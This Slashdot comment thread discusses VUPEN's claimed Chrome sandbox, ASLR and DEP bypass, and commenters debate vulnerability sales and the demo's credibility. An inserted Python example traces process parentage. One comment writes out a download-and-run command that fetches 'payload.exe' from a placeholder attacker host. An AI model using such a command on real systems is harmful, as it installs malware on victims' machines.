New Chrome Exploit Bypasses Sandbox, ASLR and DEP
Trailrunner7 writes "Researchers at the French security firm VUPEN say they have discovered several new vulnerabilities in Google Chrome that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine. The company said they are not going to disclose the details of the bugs right now, but they have shared information with some of their government customers. The vulnerabilities are present in the latest version of Chrome running on Windows 7, VUPEN said."
Disclosure policy (Score:3, Insightful)
"This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."
Oh, I feel SO MUCH better now!
Re: (Score:2)
Are you hiding your name from everyone, or are you sharing that only with /.'s government?
Re: (Score:2)
"This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."
Oh, I feel SO MUCH better now!
They're always doing that, and there are many companies like that. Basically, the bugs DO NOT GET FIXED until people (here, Google) pay up, and that's now the $5000 bounty we're talking about.
These guys literally ask for hundreds of thousands. If not, well, the bug stays there, bad advertisement for the company, etc.
I know, people should get paid for their work, including security research. But sometimes it feels like a racket.
Re: (Score:2)
Yes, and no. It may be more expensive in the short term, but it will breed them their own class of security engineers who can then both track other bugs, and provide better design and coding guidelines to prevent future bugs.
If a security firm, that presumably probes a variety of different software, can make a profit by asking 5k for a found vulnerability, then it's almost a given that in the long term you will be better off with your own people watching fewer programs and having access to the actual code.
Re: (Score:2)
Not only that, someone or more than one from Google or the community (it is an open source project after all) has to look at the problem anyway, if only to see if there are other places that have similar problems.
Re: (Score:2)
Google DOES pay people to look for these bugs all day long, what are you thinking? Every big such company has a group of people that are paid to do just that. And another group of people reviewing the coders' work.
If bugs were so easy to find, there wouldn't be any left by now. But that's often not the case.
Re: (Score:2)
I know, people should get paid for their work, including security research. But sometimes it feels like a racket.
Why should they get paid if they weren't asked to do it? Obviously they don't have to say what they found if they aren't paid, but there shouldn't be a sense of entitlement just because they did something (that they weren't asked to do).
Re: (Score:2)
I call those "brown hat hackers"; trying to screw over computer users, while somehow still being legal.
Re: (Score:3)
brown hat
what, like "shit-head" ?
Re:Disclosure policy (Score:4, Insightful)
Because ASLR and DEP aren't supposed to be the first line of defense, they are security in depth. The great thing about ASLR, DEP, and "stack canaries" is that you can start using them, and you get a huge amount of protection, -even if you screw up your own code-. The fact that the researchers have to go through the trouble of circumventing ASLR and DEP is a testament to their effectiveness.
ASLR and DEP just make existing vulnerabilities harder to exploit. Chrome's bug is still the culprit. Microsoft doesn't deserve -any- of the blame here.
Re: (Score:1)
Uh, the sandbox is also provided by the OS [chromium.org], not just ASLR and DEP.
Re: (Score:2, Troll)
Testament to their effectiveness? If they were broken through, then they were not effective.
It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.
Re: (Score:2)
Testament to their effectiveness? If they were broken through, then they were not effective.
Sure they aren't perfectly effective. But if the exploit allowed is of limited utility then that's a Good Thing.
It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.
Sure it does, since it contains many exploits, and makes crackers' work more difficult.
Re: (Score:2)
Is it of limited utility? The summary says "run arbitrary code".
How difficult it was for the crackers to find the hole in the first place does not matter to Chrome users. Someone will figure it out sooner or later, and in the end it's just another Metasploit module that takes 10 seconds to use.
Re: (Score:3, Informative)
Being able to bypass them is a testament to their bad implementation... ...my understanding is that ASLR's implementation isn't the best, but IMO it's more like "is a testament to the fact that needing ASLR at all is patching a gunshot with a bandaid".
And you say C++ is insecure and has stupid control structures, but then suggest writing it in C? Really?
Re: (Score:2)
LOL I was hoping I wasn't the only person who noticed that...
Re:Disclosure policy (Score:5, Interesting)
Blaming Microsoft in this case is extremely premature, since we know that Chrome does in fact disable some protections intentionally.
Re: (Score:1)
The exploit is due to a bug in Chrome. ASLR and DEP aren't catch-all protection mechanisms; they're just a default layer of defense against bad code. I realize this is a vehemently pro-Google site that attempts to deflect any blame toward default scapegoats like Microsoft, but your position is just not accurate in this case.
Re: (Score:2)
I don't think this is a pro-Google site, it is an anti-Microsoft site. :-)
Re: (Score:2)
Why, did they break IE also?
What about Google? (Score:3, Informative)
Re: (Score:2)
With MS in use/gifted at a state/federal level around the world, the US has their toolkit in place. News like this shows what is being offered as finally 'safe' is really rather open.
Re: (Score:2)
No, it is locked down of course, they can't install a game. :-)
Re: (Score:2)
I love a good conspiracy, but could you please explain NSA Linux [nsa.gov] then?
Re: (Score:2)
I think the folks at the Google Chrome developer team would like to speak to the VUPEN folks and find out exactly what's going on. This is because Chrome does incremental upgrades "in the background" and Google will quietly slip in an update to the browser code to close these vulnerabilities without user intervention.
Re: (Score:2)
So I'll just have to guess NSA and all the other good guys are protecting us (yeah right) until someone at Google stumbles across this issue.
While I understand the spirit in which your comment was written (and I happen to agree with you on this particular point), the NSA actually *does* have a mission to ensure US computer security. That's why they invested a hell of a lot of time in developing something like SELinux, which they open-sourced and donated, as well as providing substantial amounts of vulnerability research.
I'm not saying that their intentions are always pure, but rather that they function as a sort of chaotic good. They're not re
Good thing... (Score:1)
And even then I don't 100% trust it - any particularly suspicious sites are accessed by ssh-ing into my OpenBSD box (with its own virus-scanner and custom PF rules), then running Firefox (with Javascri
Re: (Score:1)
So long as you don't forget to properly affix your tinfoil hat, I'd say you're good to go!
Re: (Score:1)
You're a belt and suspenders kind of guy, aren't you?
Re: (Score:2)
I can crack that easily, and get at your data. You forgot rubber hose hacking...
Re: (Score:2)
Thing is, I wouldn't /like/ to have to disable JS, or run NoScript, but thanks to poor implementations of ad code, disabling it can /seriously/ speed up loading on a high(ish) latency connection.
And that's on top of all the potential attack vectors.
Speaking of which, /. runs /much/ faster on my phone when you disable JS - None of this slow ajax and hugely-long page to re-render when you add a comment.
Re: (Score:2)
I use NoScript on websites until I've determined I need the scripts. It's easy enough to enable them once I'm there, and much much faster to load complex websites without it.
Re: (Score:2)
it's running on an Athlon 900
Why?
It's not old enough to be Retro, yet not fast enough to run a GUI in 2011.
Re: (Score:2)
Never say never. I recall reading some malware can detect the presence of VMware and/or Sandboxie and get around it. Sandboxie helps, but it is of limited protection on 64 bit systems.
Re: (Score:1)
Me, running a BSD licensed OS?
I run GNU Hurd, you insensitive clod.
- rms
Smug (Score:1)
Re: (Score:3)
That was pretty smug.
Pretentiousness (Score:1)
Re: (Score:2)
Reminds me of a certain South Park episode.
Re: (Score:2)
Any OS runs on Linux with http://qemu.org/ [qemu.org] :)
Keywords making all the difference (Score:1)
that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine.
"...on a vulnerable machine...". Those are the keywords. So how is it a Chrome problem when the machine itself is vulnerable?
By the way, it was about time for /. to embed video. Please allow the same for pictures especially for slashdotters here.
Re: (Score:2)
The answer was in the few words before the ones you highlighted:
Re: (Score:2)
embedded video of goatse website on grimy monitor in 3...2...
HBGary, anyone? (Score:1)
This "VUPEN security" company, how are they any different from HBGary? They sold 0days to governments too...
I just want the damn hole closed.
from vulpen site (Score:3, Funny)
As the world leader in vulnerability research, VUPEN provides offensive and highly sophisticated exploits specifically designed for Law Enforcement and Intelligence Agencies to help them achieve their offensive missions using tailored and unique codes created in-house by VUPEN.
God I hate those french researchers, liberty fraternity equality OR DEATH my ass
Re:from vulpen site (Score:5, Insightful)
wait... in whose screwed up version of utopia do "law enforcement agencies" need "tailored and unique codes" in order to carry out their "offensive missions" ?
alternative choices:
1) get a bench warrant.
2) don't.
Re: (Score:2)
thanks, you got my point unlike the offended mod
Re: (Score:2)
3) Get a FISA warrant and install the exploit on some alleged spy's PC.
Vulnerabilities (Score:3)
These problems won't affect 95% of users. Running these sorts of attacks on end users is a bit of a waste, and something this complicated would be saved for more important targets.
A vast majority of infections out there are things that you're already guarded against if you keep your system updated.
So... (Score:3)
You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, either through an extension designed like a high school side-project or using the built in white-listing feature. This is apparently because the API does not allow for functionality along the lines of blocking individual scripts from executing.
The forums and comments sections addressing user questions as to an alternative usually had self-serving replies like "Chrome is so awesome that it doesn't need script blocking." and "It can't be owned due to sand-boxing. You know what sand-boxing is right?" (Because the only reason a person would ask is if they were an ignorant fool, right?)
So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?
Re:So... (Score:5, Insightful)
You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, [...]
So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?
I'll tell you why: Because Google's JavaScript engine compiles any script it sees into machine code for your platform, then runs that... That's why you don't need a better option for security's sake than all or none... Machine code can't escape the sand box! (Realize the truth: There is no spoon^H^H^H^H^H sandbox.)
The problem is that modern JS engines from all the major browsers do it this way -- The design of the JS language makes it hard to make a fast interpreter for it. Even if you pre-compile to byte-code and run it in a VM it's too slow.
So instead, we take arbitrary data, compile that to machine code, then EXECUTE the compiled DATA (Data Execution Prevention, eh?). Well, if it's flagging itself as executable, and it's accepting arbitrary code, I'd say that JS == Arbitrary remote code execution == one tiny step away from being an exploit anyway. I've always wondered why everyone disses ActiveX while enabling JS...
PS. I've written scripting languages. They can be slow as hell, that's the point, so long as stuff you do a lot of is formalized and written in native code, it's all good and can be run in a pretty safe interpreter or byte-code VM.
JS != general purpose compiled language.
Therefore, when you do DUMB things like complain that JS can't keep up when you try to use JS + HTML5 Canvas as your "rendering engine" for a "web application" (or even worse, games) then browser devs must meet the dumb demands by doing the dumbest thing they can against their better judgment -- Just in Time compile a virtual EXE, then run that.
The answer is to stop sacrificing security for speed, go back to software VM solutions with SIMPLE compiled languages like Lua, (I think, Lisp / Scheme too, not sure haven't checked how complex the sources are) and add standardized functions for commonly used features so we can get rid of the if(IE){...} cruft. Hint: Dynamic is the enemy of fast.
Re: (Score:2)
That's bullshit. JIT compilers increase the attack surface somewhat, but not significantly.
Also, interpretation is always going to be slow. Lua is very slow without LuaJIT. So are most Scheme and Common Lisp implementations. Which is why no one in their right mind would turn off the JIT.
A JIT may be harder to write than a bytecode interpreter, but it's not much harder to make secure.
Re: (Score:3)
The extension you are looking for is called NotScripts. [google.com]
What makes this extra awesome: Native Client (Score:3)
http://www.theregister.co.uk/2010/12/08/google_on_native_client/
Re: (Score:1)
This is the reason you don't want your browser able to access native OS code; when there's an exploit, the keys to the kingdom are in the browser.
http://www.theregister.co.uk/2010/12/08/google_on_native_client/
Native Client doesn't allow access to native OS code; it allows a restricted set of machine instructions to run in an environment that is not only heavily sandboxed, but verified pre-execution. Because it's meant to be cross-platform, it does not allow calls to the underlying OS at all. It enforces this limitation by doing a code scan to detect unauthorized instructions, unsafe branch targets, and such. It's really quite sophisticated, albeit practically unusable due to how locked down it is.
It'd be daft to
Video / Article mismatched (Score:2)
Okay, I've watched the Video twice, and read both linked articles (yeah I did) and it said that it was ..
Well I did see the Calculator applet get started, and I do see
Re: (Score:2)
Umm... who the hell cares? If you can launch a Medium IL process, then you're out of the sandbox and can launch *any* Medium IL process, even if it's from \Windows\System32\ on the local box. For example, you could instead launch /C "ftp myexploitsite.com/payload.exe" && payload.exe
\Windows\System32\cmd.exe
Commands simplified for readability, but you can do this. You probably won't have Admin, but you can still do a lot of damage - and if the user is one of those idiots who decided that UAC is too m
Why would the government care? (Score:5, Funny)
Really? (Score:2)
1. Watching the video, I see nothing that couldn't be achieved with ExtJS.
2. Chrome often has multiple processes listed in task manager. In their video, they conveniently cover all those process names with another window so you can't see them.
3. Suspicious overuse of "pwn". No company worth respecting would use "pwn" in a press release.
Re: (Score:2)
Errr, perhaps you missed where they apparently had the browser start the windows calculator executable. That's a fairly fundamental ownage right there.
Re: (Score:2)
Ok. I can schedule a task from the command line to run the calculator app. Not only that, but with custom event filters that trigger it, it would be possible to get a modified Google Chrome itself to cause the calculator to open.
His point is that they seem to be hiding something with the process window being obscured and yours is the simple fact the calculator pops up without actually running the calculator app (which could be bound to a hot-key you did not see pressed to btw) and therefore provides some credi
Re: (Score:2)
I don't see why he would be lying here when he already proved publicly he had the capability to exploit much the same flaw elsewhere.
Re: (Score:2)
In process explorer, the calc.exe is only indented far enough to be a child of explorer.exe, not chrome.exe. So surely calc.exe was launched from explorer, not chrome?
How the exploit will be used (Score:5, Interesting)
Re: (Score:1)
What kind of professional research firm for Law Enforcement uses the "word" "Pwned" in a press release?
Re: (Score:2)
The French.
Re: (Score:2)
The French.
Then shouldn't it be 'le pwned'?
Re: (Score:2)
Then why advertise it in a press release?
That would be like me constructing a dirty bomb the size of a suitcase, undetectable by everything including the TSA, and then taking out an advertisement in the New York Times announcing it exists, but only available to be auctioned to qualified really-super-scary terrorists.
You advertise a bug like this obscuring the results when you want to COOPERATE with the open/closed source programming community to both do the right thing and to gain credentials that your comp
Re: (Score:2)
Well, I suppose they're "saving" it for Pwn2Own. But given CanSecWest happened recently, they're also doing a CYA - if it gets revealed how it works, they've already scooped the story.
So it's a win-win. Either an easy victory to win that Windows laptop (sure it ain't a shiny Macbook that everyone else is going for... but it's also less competition), plus lots of money from those interested, and credit should someone else happen to discover the same bug.
Before everyone starts yelling "fake" (Score:3)
Not to say it proves he did it again with Chrome, but at least the guy's got some credit for being able to pull this one off.
Stuff you can figure out from the video... (Score:1)
Re: (Score:2)
Correct, suspended processes have a darker gray background. The light gray is the selection highlight for inactive windows.
It's somewhat suspicious, though, that the un-maximized Chrome window is set up to obscure all but the new medium-trust chrome.exe and calc.exe.
It looks to me like they've done some heap spraying in chrome.exe (see the unusual 450MB working set).
The list of 'gray' processes in the 2nd procexp session are:
1) explorer.exe
2) process_explorer.exe
3) process_explorer64.exe
4) chrome.exe (UI)
5)
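The parent/child question raised about the Process Explorer indentation (is calc.exe really a descendant of chrome.exe, or a sibling of it under explorer.exe?) can be answered mechanically from a process snapshot. This is an added example, not code from the thread, from VUPEN or from the Chromium project: it parses a constructed "pid ppid name" listing and walks the parent chain for each calc.exe. The snapshot and all PIDs are constructed, and a live tree (and PID reuse) are out of scope.

```python
"""Walk process ancestry from a tasklist/procexp-style snapshot.

Added example: decides whether a process descends from a browser process
or sits directly under the shell, which is the question raised about the
calc.exe indentation in the demo video.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str


# Constructed snapshot, one process per line as "pid ppid name".
# These values are made up for the example, not taken from the video.
SNAPSHOT = """\
4 0 System
612 4 wininit.exe
1340 612 explorer.exe
2208 1340 procexp.exe
2216 2208 procexp64.exe
2480 1340 chrome.exe
2504 2480 chrome.exe
2520 2480 chrome.exe
3012 1340 calc.exe
"""


def parse_snapshot(text):
    """Map pid -> Proc; blank lines are skipped."""
    procs = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, name = line.split(maxsplit=2)
        procs[int(pid)] = Proc(int(pid), int(ppid), name)
    return procs


def ancestry(procs, pid):
    """Return [proc, parent, grandparent, ...]; stops at a missing parent or a cycle."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def descends_from(procs, pid, ancestor_name):
    """True if any strict ancestor of pid has the given image name (case-insensitive)."""
    return any(p.name.lower() == ancestor_name.lower() for p in ancestry(procs, pid)[1:])


def find_by_name(procs, name):
    return [p.pid for p in procs.values() if p.name.lower() == name.lower()]


def main():
    procs = parse_snapshot(SNAPSHOT)
    for pid in find_by_name(procs, "calc.exe"):
        chain = " <- ".join(f"{p.name}({p.pid})" for p in ancestry(procs, pid))
        verdict = "under chrome.exe" if descends_from(procs, pid, "chrome.exe") else "NOT under chrome.exe"
        print(f"{chain}: {verdict}")


if __name__ == "__main__":
    main()
```

In the constructed snapshot calc.exe reports to explorer.exe, which is exactly the "launched from explorer, not chrome" reading of the indentation.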
Responsibility (Score:1)
Since they aren't informing the vendor so it can get patched, are they going to take responsibility when it does get into the wild?
Oh, we're a big security company, we're secure!
Yeah right!
Show me a boat that doesn't leak!
Cheap - flawed - marketing (Score:2)
That video shows exactly nothing - any 2 screen system can do Windows-R + "calc" offscreen and lob it into the picture, whilst it's looking at a web page. You can also not see if it really is a sub-process, that part is obscured. As far as I can judge by the indentation it is NOT a sub process - thus no hack. But I'm no expert - unlike them I won't pretend to be one either. In summary, this *seriously* lacks credibility.
It's IMHO a rather stupid attempt at getting their name out there and lick up to Frenc
Sandbox not in os (Score:2)
Re: (Score:2)
True, but security researchers are not fighting the scattered guy in the basement who manages to find a hole.
There are criminal organizations which are big enough to fund people in researching holes, as well as buying 0-days from the black market. Then using these either for a focused attack against a company, or casting it on the wind to gather up clients for a botnet. All that is needed is a 0-day hole in a browser or browser add-on coupled with an exploit to get Administrator rights, paste this on the Web usin
Re: (Score:1)
The stupidity of your post isn't the worst part. It's the fact that, as of this writing, you're modded Insightful.
Re: (Score:3, Interesting)
Chrome's sandbox is Windows' sandbox [chromium.org], so that's perfectly possible.
Re: (Score:3)
I'm glad you put "possible" in italics to emphasise that this didn't necessarily mean it was the cause of the issue. Chrome implementing the sandbox, while overriding memory protection, kind of negates the purpose of the sandbox. (Although, it prevents "natively" bad stuff from affecting the system. However anything attacking the browser itself can still access system memory).
To be fair though, the demonstration of this vulnerability has exposed nothing other than the ability to load known programs in know
Interesting, why the government? (Score:1)
Does this mean government contractors will get access to the exploit code?
I guess this will help them wiretap.
Re: (Score:1)
You are confusing a sandbox written by Google for Windows with a Windows sandbox written by Microsoft. Google WROTE the Windows sandbox that Chrome uses.
Re: (Score:2, Troll)
And after reading the above, I conclude that the Windows security model is ...sh1t.
First of all, it's extremely complex. It takes a long web page just to describe some aspects of it.
Secondly, it's extremely disjoint: each little piece of Windows, having been developed in isolation, went its own way, which results in not being able to enforce a single security system all over the system.